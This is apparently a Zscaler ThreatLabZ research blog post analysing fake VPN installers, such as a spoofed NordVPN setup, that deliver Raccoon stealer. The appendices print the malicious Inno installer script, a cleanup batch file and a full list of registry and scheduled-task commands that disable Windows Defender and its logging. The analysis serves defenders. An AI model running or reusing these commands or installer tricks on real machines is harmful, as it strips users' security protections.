Live Global Events: Secure, Simplify, and Transform Your Business.

Zscaler Blog

Get the latest Zscaler blog updates in your inbox

Security Research

Threat Actors Distribute Malicious VPN Apps Masquerading as Popular Vendors

May 21, 2021 - 15 min read


In May 2021, Zscaler ThreatLabZ observed several new domains registered by a threat actor for distribution of spoofed and malicious versions of popular VPN softwares. Threat actors have shifted their tactics, techniques, and procedures (TTPs) to target VPN users over the past year, taking advantage of the increase in remote work and the popularity of VPN applications.

We observed this particular actor spoofing VPN applications, such as NordVPN, F-secure Freedom VPN, Avast Secureline VPN, and Hotspot Shield, to distribute the infostealer known as Raccoon stealer. Several lookalike websites containing malicious download links were hosted on domains registered by the actor in May 2021 using the Njalla domain hosting provider.

Njalla has been used in the past by advanced persistent threat (APT) actors, such as Lazarus and Sandworm. ThreatLabZ closely monitors the network infrastructure used by these threat actors, which led to the discovery of this campaign.

For this blog, we performed a deep-dive technical analysis of the malicious setup files, the evasion techniques used, and the final payload delivered.


Attack flow

The attack starts when users visit a lookalike website registered by the threat actor to distribute VPN applications. As an example, the domain: vpnnords[.]com was registered by the attacker and used to host the webpage as shown in Figure 1. This page looks almost identical to the homepage of the legitimate NordVPN website. The only difference is that the “Download Free” button on this page leads to the download of a malicious NordVPN setup file hosted on a file-sharing website.

The complete list of domains registered by the attacker to target VPN users is included in the IOCs section.

Figure 1

Figure 1: Malicious webpage that looks similar to the legitimate NordVPN website

Download link of setup file: hxxps://filetransfer[.]io/data-package/tZCy19qQ/download

The downloaded file looks like a legitimate setup file of NordVPN—it uses the same file icon and even displays the graphical user interface (GUI) of NordVPN—but performs malicious activities in the background, which we describe in detail in the technical analysis section.


Low detection by security vendors

All the domains used in this attack and registered by the threat actor have no detection on VirusTotal and all security vendors mark these domains as clean.

One such example is shown in Figure 2.

Figure 2

Figure 2: No detection for the malicious domain(s) on VirusTotal by security vendors

This highlights how this attack has been flying under the radar and the importance of proactive hunting techniques, which helped us discover these domains.


Technical analysis

For the purpose of technical analysis, we will consider the file with the MD5 hash: e157f55aff49fe53befa3484d5e2b575


Static analysis

Similar to the legitimate NordVPN setup file, the fake NordVPN setup is packaged using Inno Installer, but the file structure inside the package is different. Figure 3 below shows the file structure for both legit and fake setup.

Figure 3

Figure 3: File structure for Inno-packaged fake and legitimate NordVPN setup files


[+] Inside the fake installation package

As shown in Figure 3 above, the package contains the following files.

  • Legitimate NordVPN setup – NordVPNSetup.exe. The NordVPNSetup.exe is the latest version of NordVPN with MD5 hash: 4e6183906dfe035954ec0260c573ab03
  • Seven files for performing different malicious operations. These files are described in more detail in the “Component analysis” section
  • The Inno package installer script – install_script.iss. All the files inside the package are encrypted using a password as defined in the [Setup] section of the installer script

Note: The Inno package installer script for the fake NordVPN setup is available in the appendix section


[+] Component analysis

In this section, we perform a technical analysis of the individual components packaged inside the malicious setup file.

Naming convention of component files

All the script (VBS and BAT) file components in this package follow a naming convention. The first few characters indicate the purpose of the script followed by an array of random characters appended to it.


# STRT indicates starting or initialization

STRTbbbn7przuvwav4hbpbps.vbs  = “STRT”  + “bbbn7przuvwav4hbpbps” + “.vbs”

# AVD indicates AV disable

AVDbbbn7i3b4ho55ck6raahj.bat = “AVD” + “bbbn7i3b4ho55ck6raahj” + “.bat”

# DEL indicates delete the components and cleanup

DELbbbn7l3bnchd166d2hhhv.bat = “DEL” + “bbbn7l3bnchd166d2hhhv” + “.bat”


VBScript analysis

MD5 hash: b5d6f5e514757d7b075ed59d79b8f2e2
Filename: STRTbbbn7przuvwav4hbpbps.vbs 

This VBScript is big in size because of the inclusion of junk instructions, which declare a lot of variables that are not used anywhere in the code.

After cleaning up, the script looks like shown in Figure 4.

Figure 4

Figure 4: Cleaned up VBScript.

The main purpose of this script is to execute the three BAT files, described in the next section. The VBScript creates a delay between the execution of each BAT script using a random delay parameter, calculated as follows.

Dim max,min


BAT files analysis

[Component #1: Disable security softwares]

MD5 hash: 7924178f4a19db114e1fbb2764b8b409
Filename: AVDbbbn7i3b4ho55ck6raahj.bat 

This BAT file is mainly responsible for disabling security software on the machine. It specifically targets Windows Defender and Exploit Guard. To disable the security service features, it leverages reg.exe to alter the Windows registry keys specific to Windows Defender and Exploit Guard.

In addition, the file disables system services and scheduled tasks related to Windows Defender.

Similar to the VBS file, this BAT file is large. This is because long strings of Base64-encoded data are included in the file and the commands are inserted between them, as shown in Figure 5.

Figure 5

Figure 5: Commands inserted between Base64-encoded blobs in the BAT file

The complete list of commands executed by this BAT file to disable security services and features is included in Appendix.

[Component #2: Main]

MD5 hash: b3a6b11fcf113f692648bc8f0f3f898e 
Filename: main.bat

This BAT file uses a byte order mark (BOM) in the first two bytes, in which it displays only Unicode characters when the file is opened using Notepad++ or any other text editor.

The first two bytes are {0xFF 0xFE} as shown in Figure 6.

Figure 6

Figure 6: Byte order mark (BOM) inserted in first two bytes of the BAT file

Once we delete these two bytes, we can view the contents successfully with a text editor, such as Notepad++, as shown in Figure 7.

Figure 7

Figure 7: Cleaned BAT file

The main actions performed by this BAT file are:

1. Creates a temp directory called "extracted" in the current directory
2. Renames the encrypted file.bin to
3. Decrypts and extracts the contents of using the password: "___________7876pwd4897pwd19506___________"
4. Extracts all the components after decrypting and renames to file.bin
5. Executes sihost.exe

After further analysis, we discovered that an open-source anti-antivirus obfuscator was used to package the files. This obfuscator will generate a BAT file and package everything using 7zip to create an encrypted and password-protected, multilayer archive file.

This GitHub project was used by the threat actor:

In our case, the archive file is called file.bin

MD5 hash: b2880d44773178644ff13d755e96d5e2
FIlename: file.bin

This is an encrypted ZIP archive that, when decrypted, with the password “___________7876pwd4897pwd19506___________” contains the following main components:
Sihost.exe - 32-bit .NET Binary

[Component #3: Cleanup]

MD5 hash: 228c709d87e5ff50e7d5c05b1a7f6c03
Filename: DELbbbn7l3bnchd166d2hhhv.bat

Deletes all the components that were used in the initialization stage of the setup.

@echo off
timeout /T 60 /NOBREAK > Nul
Del /f /q "AVDbbbn7i3b4ho55ck6raahj.bat"
Del /f /q "STRTbbbn7przuvwav4hbpbps.vbs"
Del /f /q "STR2bbbn7przuvwav4hbpbps.vbs"
Del /f /q "7z.dll"
Del /f /q "7z.exe"
Del /f /q "main.bat"
Del /f /q "file.bin"
Del /f /q "LODbbbn7pkeaxe7obg0ydlex.bat"
Del /f /q "DELbbbn7l3bnchd166d2hhhv.bat"

Dynamic analysis

When the Inno packaged fake NordVPN setup is executed, it extracts the legitimate NordVPN setup file to the path: "%ProgramFiles%\" or "%ProgramFiles(x86)%\", while all the malicious operation-related files are extracted to the path "%SystemDrive%\ProgramData\SZUCiTYO44EalgWu\".

As per the [Run] section of the installer Inno script, the legitimate NordVPN setup is executed first, followed by the malicious VBScript execution. Operating in this order prevents the end-user from suspecting that any malicious activity is being performed on the user's machine.

Figure 8 below shows the installation window that is displayed to the end-user as a result of legitimate NordVPN setup execution, while the malicious activity is being performed in the background. 

Figure 8

Figure 8: Installation window shown to the end-user

[+] .Net binary analysis

As described earlier, the VBS and BAT scripts' execution finally results in dropping and executing the .NET binary with the name, sihost.exe. Similar to all the payloads in the infection chain, the .NET binary is obfuscated and consists of multiple layers that make binary analysis difficult and help to bypass the AV products.

// Main binary

The main binary has the project name “StarEggControl”. On execution, it loads the next layer binary, which is stored as an image in the resource section with the full resource path “StarEggControl.frmSolucao2.image1” and it is constructed using individual pixel information from the stored image. The code responsible for binary construction is shown in Figure 9 below. 

Figure 9

Figure 9: Image to binary construction using individual pixels 

Once the binary construction is complete, the binary is loaded as a runtime module. The module is a .NET DLL with the name SampleUI.dll. Code execution is transferred to this DLL by calling SampleUI.MDI class with three parameters:

ugz1: "54776F5061746873" – Encoded resource name for next layer binary
ugz3: "59596A6F71" – Encoded key which is used to decrypt the next layer binary
projname: “StarEggControl” – Project name of main .NET binary

// SampleUI.dll

Similar to the previous layer, the SampleUI.dll also loads the next layer binary, which is stored as a bitmap image inside the resources of the main binary itself. The resource name when decoded using the parameter ugz1 is: "TwoPaths" and the full resource path is:  “StarEggControl.Resources.TwoPaths”

The next-layer binary is constructed from the retrieved Bitmap image using a custom algorithm implementation that uses XOR operation. The XOR key is derived using the parameter ugz3 which turns out to be "YYjoq"

The constructed binary is again loaded as a runtime module, which is also a .NET DLL with the name “公jrxl的A太 wCe”. Code execution is transferred to the DLL by calling the class with the name: “公jrxl的A太 wCe.d司J物rU族家的v行是o.z官司C生bqT的A”.

Please note that the class and method names inside the .NET binary contain Unicode characters to deter the process of static analysis and reverse engineering.

Figure 10 below shows the code flow for binary construction, loading, and transfer of code execution.

Figure 10

Figure 10: Decoding the bitmap to binary and transferring execution

// 公jrxl的A太 wCe

This is the final layer, which is responsible for loading and executing the main malware payload of the infection chain. The malware payload is stored among the resources of this final layer DLL with the resource name “ifF3K”. Like previous layers, the main malware payload is present in encrypted form.

Executing further, the malware payload is decrypted, a new suspended version of the main .NET binary sihost.exe is created, and the malware payload is injected into the suspended process using the Hollow Process Injection technique.

The injected malware payload is the well-known information stealer known as Raccoon stealer.

Similar builds but different themes

Pivoting on the package build, we found more than 500 samples (more than 50% of these samples have less than 10 detections) and two additional themes being used to deliver malware payload—one was related to multimedia applications and the other to security softwares. We have not confirmed whether the Raccoon stealer is the final payload for all the samples, but they seem similar to the current attack.


Zscaler Cloud Sandbox report

Figure 11

Figure 11: Zscaler Cloud Sandbox report

In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels.


- Win32.PWS.Raccoon









Attacker hosted fake websites leading to malicious file download


User Execution: Malicious File

User executes the downloaded file


Deobfuscate/Decode Files or Information

Strings and other data are obfuscated in the payloads


Obfuscated Files or Information: Software Packing

Payloads are packed in layers


Indicator Removal on Host: File Deletion

Deletes all the components which were used in the initialization stage


Process Injection: Process Hollowing

Use hollow process injection technique to execute the final malware payload


Impair Defenses

Disables Windows Defender features and log audits


System Time Discovery

One of Raccoon capabilities


Account Discovery

One of Raccoon capabilities


File and Directory Discovery

One of Raccoon capabilities


Process Discovery

One of Raccoon capabilities


Query Registry        

One of Raccoon capabilities


Screen Capture

One of Raccoon capabilities


System Information Discovery

One of Raccoon capabilities


System Network Configuration Discovery

One of Raccoon capabilities


Encrypted Channel: Symmetric Cryptography

One of Raccoon capabilities



Indicators of compromise


















Raccoon Stealer


// Few other VPN  packages




Malicious domains


Dropped files




// install_script.iss from fake NordVPN Inno package

;InnoSetupVersion=6.0.0 (Unicode)

AppPublisher=EalgWuSZUCiTYOIJi EalgWu
; Encryption=yes
; PasswordHash=b525fbe0090152aa48b9e832d1c72bdc48e94461
; PasswordSalt=702a76b833fdb38f

Source: "{app}\NordVPNSetup.exe"; DestDir: "{app}"; MinVersion: 0.0,6.0; Flags: deleteafterinstall ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.exe"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\7z.dll"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\file.bin"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\main.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\AVDbbbn7i3b4ho55ck6raahj.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\DELbbbn7l3bnchd166d2hhhv.bat"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 
Source: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; DestDir: "{sd}\ProgramData\SZUCiTYO44EalgWu"; MinVersion: 0.0,6.0; Flags: ignoreversion 

Filename: "{app}\NordVPNSetup.exe"; Description: "{cm:LaunchProgram,SZUCiTYOSZUCiTYO IJiEalgWu}"; MinVersion: 0.0,6.0; Flags: postinstall skipifsilent nowait
Filename: "{sd}\ProgramData\SZUCiTYO44EalgWu\STRTbbbn7przuvwav4hbpbps.vbs"; Description: "{cm:LaunchProgram,Generator}"; MinVersion: 0.0,6.0; Flags: shellexec nowait

default.NameAndVersion=%1 version %2
default.AdditionalIcons=Additional shortcuts:
default.CreateDesktopIcon=Create a &desktop shortcut
default.CreateQuickLaunchIcon=Create a &Quick Launch shortcut
default.ProgramOnTheWeb=%1 on the Web
default.UninstallProgram=Uninstall %1
default.LaunchProgram=Launch %1
default.AssocFileExtension=&Associate %1 with the %2 file extension
default.AssocingFileExtension=Associating %1 with the %2 file extension...
default.AutoStartProgram=Automatically start %1
default.AddonHostProgramNotFound=%1 could not be located in the folder you selected.%n%nDo you want to continue anyway?

; These files are stubs
; To achieve better results after recompilation, use the real language files
Name: "default"; MessagesFile: "embedded\default.isl"; 

// Commands executed to disable system security services

reg  add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f"
reg  delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f"
reg  add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f"
reg  add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f"
reg  add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f"
reg  delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f"
reg  delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f"
reg  delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f"
reg  delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f"
reg  delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f"

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

reg  add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f"
reg  add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f"

// Altering scheduled tasks on the machine related to security services.

schtasks  /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
schtasks  /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

form submtited
Thank you for reading

Was this post useful?

Explore more Zscaler blogs

A cyber criminal shopping for malware
Agniane Stealer: Dark Web’s Crypto Threat
Read Post
Business people walking through a city
The Impact of the SEC’s New Cybersecurity Policies
Read Post
Digital cloud illuminated in blue
Security Advisory: Remote Code Execution Vulnerability (CVE-2023-3519)
Read Post
The TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region
Read Post
01 / 02
dots pattern

Get the latest Zscaler blog updates in your inbox

By submitting the form, you are agreeing to our privacy policy.